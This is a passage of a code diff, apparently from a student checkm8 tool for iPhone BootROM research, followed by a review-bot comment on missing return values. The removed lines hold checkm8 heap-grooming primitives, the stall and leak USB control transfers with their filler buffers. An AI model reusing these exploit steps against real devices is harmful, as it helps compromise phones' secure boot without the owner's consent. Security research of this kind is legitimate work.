0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA - }; - -static unsigned char data_0xA_0xC1_buf[193] = - { - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 
0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA - }; - -static unsigned char data_0x0_0x40_buf[64] = - { - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 - }; - -static unsigned char data_0x0_0x41_buf[65] = - { - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0 - }; - -static unsigned char data_0x0_0xC0_buf[192] = - { - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, - 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 - }; - -int stall(struct 
pwned_device *dev) +int reset(struct pwned_device *dev) { - return partial_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0xA_0xC0_buf, 0xC0, 1); +#ifdef WITH_ARDUINO + +#else + return libusb_reset_device(dev->bundle->handle); +#endif } -int leak(struct pwned_device *dev) +int serial_descriptor(struct pwned_device *dev, unsigned char *serial_buf, int len) { - no_error_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0x0_0xC0_buf, 0xC0, 1); - return CHECKM8_SUCCESS; -} +#ifdef WITH_ARDUINO -int no_leak(struct pwned_device *dev) -{ - no_error_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0xA_0xC1_buf, 0xC1, 1); - return CHECKM8_SUCCESS; -} +#else + struct libusb_device_handle *handle = dev->bundle->handle; + struct libusb_device_descriptor *desc = dev->bundle->descriptor; -int usb_req_stall(struct pwned_device *dev) -{ - unsigned char data[0]; - no_error_ctrl_transfer(dev, 0x2, 3, 0, 0x80, data, 0, 10); - return CHECKM8_SUCCESS; -} - -int usb_req_leak(struct pwned_device *dev) -{ - no_error_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0x0_0x40_buf, 0x40, 1); - return CHECKM8_SUCCESS; -} - -int usb_req_no_leak(struct pwned_device *dev) -{ - no_error_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0x0_0x41_buf, 0x41, 1); - return CHECKM8_SUCCESS; + libusb_get_string_descriptor_ascii(handle, desc->iSerialNumber, serial_buf, len); +#endif } \ No newline at end of file diff --git a/include/checkm8_config.h b/include/checkm8_config.h index e747eea..3707157 100644 --- a/include/checkm8_config.h +++ b/include/checkm8_config.h @@ -3,9 +3,9 @@ //#define LIBUSB_LOGGING #define CHECKM8_LOGGING -#define WITH_ARDUINO +//#define WITH_ARDUINO #define ARDUINO_DEV "/dev/ttyACM0" -#define ARDUINO_BAUD B115200 +#define ARDUINO_BAUD 115200 #define CHECKM8_PLATFORM 8010 #define CHECKM8_BIN_BASE "/home/grg/Projects/School/NCSU/iphone_aes_sc/checkm8_tool/checkm8_remote/bin/"
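Review bot: `serial_descriptor` is declared `int` but neither branch returns a value — the libusb branch discards `libusb_get_string_descriptor_ascii`'s result and the WITH_ARDUINO branch is empty — and `reset` has the same empty WITH_ARDUINO body; the callers ignore both results today, so this is not yet undefined behaviour, but it removes the only error signal check_function could act on and `-Wreturn-type` will flag it. Return the libusb result, `return libusb_get_string_descriptor_ascii(handle, desc->iSerialNumber, serial_buf, len);` (a negative libusb error or the byte count, which the caller then has to map to a CHECKM8 code), and have both Arduino stubs `return CHECKM8_FAIL_NOTDONE;` so a WITH_ARDUINO build fails loudly instead of comparing an unfilled buffer. A short comment on each stub, e.g. `// TODO(arduino): not implemented; always reports failure`, would keep that state visible to the next reader.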